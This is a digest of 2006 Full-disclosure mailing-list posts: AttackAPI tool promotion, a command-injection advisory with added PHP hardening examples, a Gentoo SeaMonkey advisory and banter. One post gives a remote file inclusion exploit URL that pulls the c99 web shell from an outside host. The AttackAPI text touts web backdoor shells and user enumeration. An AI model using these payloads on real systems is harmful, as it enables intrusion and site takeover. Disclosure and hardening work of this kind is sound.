entire Internet for well known vulnerabilities (the VNC authentication
bypass bug) in a quarter of the time required.

That won't be possible without help from the NetworkCalculator.
Generating IPs, cutting subnets, transforming IP addresses are just a
few of the functionalities currently supported.

Then the JavaScript shell is not what it seems to be. Yes, it is a
good tool that you can use to quickly try JavaScript expressions but
it is a lot more interesting to see the internal workings behind the
fancy black console. In the core you will find functionalities that
can be used to easily integrate a shell-like interface into any web
backdoor. Do you want to bind a fancy SQL console to a SQL Injection
attack in order to emulate a shell interface to the backend database?
The MasterAPI library is ready for that.

MasterAPI and the RequestBuilder from AttackAPI are all that the
attacker needs to achieve that. Building XMLHttpRequest objects is
quite easy. The use of them is up to your imagination.

Sometimes attackers want to identify usernames. If your username is
Persi Johnson and you have a del.icio.us extension installed, it is
quite likely that the same http://del.icio.us/PersiJohnson is you. The
UsernameScanner is a handy trick that can be used in many situations.
Enumerating local user names has never been easier.

The URLScanner seems to be simple, yet, a lot more needs to be done to
expose its efficiency. Do you want to run Nikto from your browser or
you want to build a JavaScript based vulnerability scanning tool? All
you need to do is to provide the database and the rest will be
magically handled for you.

Base64 is the right way of doing many things. So we use it here as well.

GoogleSearch scares m

[Full-disclosure] Asbru HardCore Web Content Editor - Command Injection

2006-10-16 Thread security


n.runs GmbH
http://www.nruns.com/ [EMAIL PROTECTED]
n.runs-SA-2006.001   15-Oct-2006


Vendor:        Asbru Software, http://asbrusoft.com
Product:       Asbru HardCore Web Content Editor,
               http://editor.asbrusoft.com/
Vulnerability: Command Injection



Vendor communication:

  2006/10/05    initial notification of AsbruSoft
  2006/10/08    fix was created over the weekend, released
                on Oct 8.


Overview:

The Asbru Software Web Content Editor allows for web-based advanced text
processing, replacing the typical TEXTAREA input fields with a rich user
interface, offering HTML editing capabilities, formatting and various other
features. It integrates with Asbru Software's Content Management System,
works with most modern browsers and comes in versions for ASP, ASP.NET,
PHP, ColdFusion and JSP.

Description:

The spell checking feature uses ASpell, which is invoked through the
respective language's process creation commands, such as proc_open() in
PHP, Runtime's exec() method in JSP, shell.Run() in ASP and the like. All
these invocations are prone to a command injection attack, since ASpell's
dictionary argument is specified from an HTTP request parameter and the
input is not sanitized. This leads to immediate shell command execution if
an attacker carefully crafts this parameter's value. The vulnerability is
*only* present if the spell checking capability is in use.

Solution:

AsbruSoft reacted very quickly. The vulnerability was reported on Oct 5 and
a fix was created over the weekend, released on Oct 8. The updated version
6.0.22 is available from http://editor.asbrusoft.com/page.php/id=727.


Credit: 
  Bug found by Jan Muenther of n.runs GmbH. Thanks  


References: None  


The information provided is released by n.runs "as is" without warranty
of any kind. n.runs disclaims all warranties, either express or implied,
except for the warranties of merchantability. In no event shall n.runs be
liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
n.runs has been advised of the possibility of such damages.
Distribution or reproduction of the information is permitted provided that
the advisory is not modified in any way.

Copyright 2006 n.runs. All rights reserved. Terms of use.
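As an added example (not Asbru Software's code and not from the advisory), the PHP variant of the flaw described above next to two ways of closing it: the request-supplied dictionary name is checked against an allow-list, and the command is either quoted with escapeshellarg() or, on PHP 7.4 and later, passed to proc_open() as an argv array so that no shell parses it at all. ASPELL_BIN, dictionaryName(), buildSpellCommandUnsafe(), buildSpellCommand() and misspelledWords() are hypothetical names.

```php
<?php
declare(strict_types=1);

// Added example, not Asbru Software's code. The unsafe and the hardened way
// of handing a request-supplied dictionary name to aspell from PHP.
// ASPELL_BIN, dictionaryName(), buildSpellCommandUnsafe(),
// buildSpellCommand() and misspelledWords() are hypothetical names.

const ASPELL_BIN = '/usr/bin/aspell';

// The shape the advisory describes: the parameter is pasted into a command
// line that a shell will parse, so any shell metacharacter in it is honoured.
function buildSpellCommandUnsafe(string $requestedLang): string
{
    return ASPELL_BIN . ' -a --lang=' . $requestedLang;   // do not use
}

// First line of defence: an allow-list. aspell dictionary names are short and
// consist of letters, digits, '_' and '-' (en_US, de-DE, ...); nothing else is
// accepted, regardless of how the command is later built.
function dictionaryName(string $requestedLang): string
{
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_-]{0,15}$/', $requestedLang)) {
        throw new InvalidArgumentException('unsupported dictionary');
    }
    return $requestedLang;
}

// Second line: if a shell string must be built (PHP before 7.4), quote the
// value with escapeshellarg() so the shell sees one literal word.
function buildSpellCommand(string $requestedLang): string
{
    return ASPELL_BIN . ' -a --lang=' . escapeshellarg(dictionaryName($requestedLang));
}

// Preferred on PHP >= 7.4: pass argv as an array. proc_open() then executes
// the binary directly and no shell ever interprets the dictionary name.
function misspelledWords(string $text, string $requestedLang): array
{
    $argv = [ASPELL_BIN, '-a', '--lang=' . dictionaryName($requestedLang)];
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start aspell');
    }
    // In aspell's pipe mode a leading '^' means "check this line", which
    // keeps text that begins with a pipe-mode command character from being
    // taken as a command.
    fwrite($pipes[0], '^' . str_replace("\n", ' ', $text) . "\n");
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);

    // Lines starting with '&' or '#' report a misspelling; the second token
    // on such a line is the word itself.
    $words = [];
    foreach (explode("\n", (string) $out) as $line) {
        if ($line !== '' && ($line[0] === '&' || $line[0] === '#')) {
            $parts = explode(' ', $line);
            if (isset($parts[1])) {
                $words[] = $parts[1];
            }
        }
    }
    return $words;
}

// Usage from a request handler:
// $bad = misspelledWords($_POST['text'] ?? '', $_POST['lang'] ?? 'en');
```

The allow-list is the check that matters in every language the advisory lists: an argv-style process API (array form of proc_open(), ProcessBuilder in Java) removes the shell from the picture, while a string-based API such as shell.Run() can only be made safe by restricting the value before it is concatenated.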




Re: [Full-disclosure] Vuln ....

2006-10-16 Thread Pink Hat
On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
> Hey you could start by writing those sites in english :P
>

http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8

Not perfect but readable... I guess...



Re: [Full-disclosure] Vuln ....

2006-10-16 Thread wac
Hey you could start by writing those sites in english :P

On 10/13/06, hitham hitham <[EMAIL PROTECTED]> wrote:
> ===
> # Found By Sp1deR_NeT ..
> # E-mail :- [EMAIL PROTECTED]
> # Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com
> # We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )
>
> *Script :- PHP rojekt 5.1.1
>
> -Code Vuln :-
> $include_path = $path_pre.'lib/lib.inc.php';
> include_once($include_path)
>
> In File :- editor_big.php
>
> -Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?
>
> Example :-
> www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?
> -
> [EMAIL PROTECTED]
> Sp1deR_NeT ^__^
> ===
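As an added example (not the project's code and not from the quoted post), the hardened counterpart of the include quoted above: the prefix is fixed by the script's own location rather than by a request-controlled $path_pre, and the resolved path is checked to stay inside the install directory, so neither a remote URL nor a path outside the tree can be included. libraryPath() is a hypothetical helper name.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Hardened form of the quoted
// include: the prefix is never read from the request, and the final path
// must resolve inside the application root. libraryPath() is hypothetical.

function libraryPath(string $appRoot, string $relative): string
{
    $root = realpath($appRoot);
    $full = realpath($appRoot . DIRECTORY_SEPARATOR . $relative);
    // realpath() returns false for missing files and for URLs, and resolves
    // ".." and symlinks, so a prefix comparison on its result is a genuine
    // containment check rather than a string-match that "../" could dodge.
    if ($root === false || $full === false
        || strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('refusing to include ' . $relative);
    }
    return $full;
}

// With register_globals on, the original "$path_pre" could be supplied in the
// query string. Here it is derived from __DIR__ (this file sits in lib/, one
// level below the application root) and is never taken from input.
$path_pre = dirname(__DIR__);
include_once libraryPath($path_pre, 'lib/lib.inc.php');
```

Independently of the code change, register_globals and allow_url_include (allow_url_fopen on PHP 4) should be off in php.ini; the first removes the variable overwrite, the second stops include_once() from fetching anything over HTTP even if a path check is missed elsewhere.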



[Full-disclosure] [ GLSA 200610-04 ] Seamonkey: Multiple vulnerabilities

2006-10-16 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Seamonkey: Multiple vulnerabilities
      Date: October 16, 2006
      Bugs: #147651
        ID: 200610-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Seamonkey project has reported multiple security vulnerabilities in
the application.

Background
==========

The SeaMonkey project is a community effort to deliver
production-quality releases of code derived from the application
formerly known as 'Mozilla Application Suite'.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /            Unaffected
    -------------------------------------------------------------------
  1  www-client/seamonkey             < 1.0.5                  >= 1.0.5

Description
===========

A number of vulnerabilities have been found and fixed in Seamonkey. For
details please consult the references below.

Impact
======

The most severe vulnerability involves enticing a user to visit a
malicious website, crashing the application and executing arbitrary
code with the rights of the user running Seamonkey.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Seamonkey users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.0.5"

References
==========

  [ 1 ] CVE-2006-4253
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4253
  [ 2 ] CVE-2006-4565
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4565
  [ 3 ] CVE-2006-4566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4566
  [ 4 ] CVE-2006-4568
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4568
  [ 5 ] CVE-2006-4570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4570
  [ 6 ] CVE-2006-4571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4571

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



Re: [Full-disclosure] Fwd: [EMAIL PROTECTED] tmail.com wants to talk to you!

2006-10-16 Thread Ferdinand Klinzer
Because you are the pink hax0r... he needs you for his next terror attack.

cheers

On 16.10.2006 at 00:13, Pink Hat wrote:

> Why would a terrorist want to add me to his MSN?
>
> -- Forwarded message --
> From: [EMAIL PROTECTED] <[EMAIL PROTECTED]>
> Date: Oct 15, 2006 2:15 PM
> Subject: [EMAIL PROTECTED] wants to talk to you!
> To: [EMAIL PROTECTED]
>
> [EMAIL PROTECTED] wants to talk to you!
>
> Get this program so you can connect directly and instantly with your
> friends, family members, work colleagues or anyone else you choose.
>
> Go to http://get.live.com/messenger/overview to download the program you
> want to start using.
>
> Enter my e-mail address: [EMAIL PROTECTED]
>
> Once installation is complete, add me to your contact list using the
> "Add" button and this address.
>
> With the program you can:
>
> Send instant messages; they are fast, easy and free!
> Know when your friends or family members are online.
> Call a friend's computer for a voice conversation.
> Know when your friend replies to a message.
> Receive a notification when new e-mail arrives.
> Add emoticons to your messages.
>
> Note: some of these features may not be available when using Messenger
> on devices other than standard personal computers.
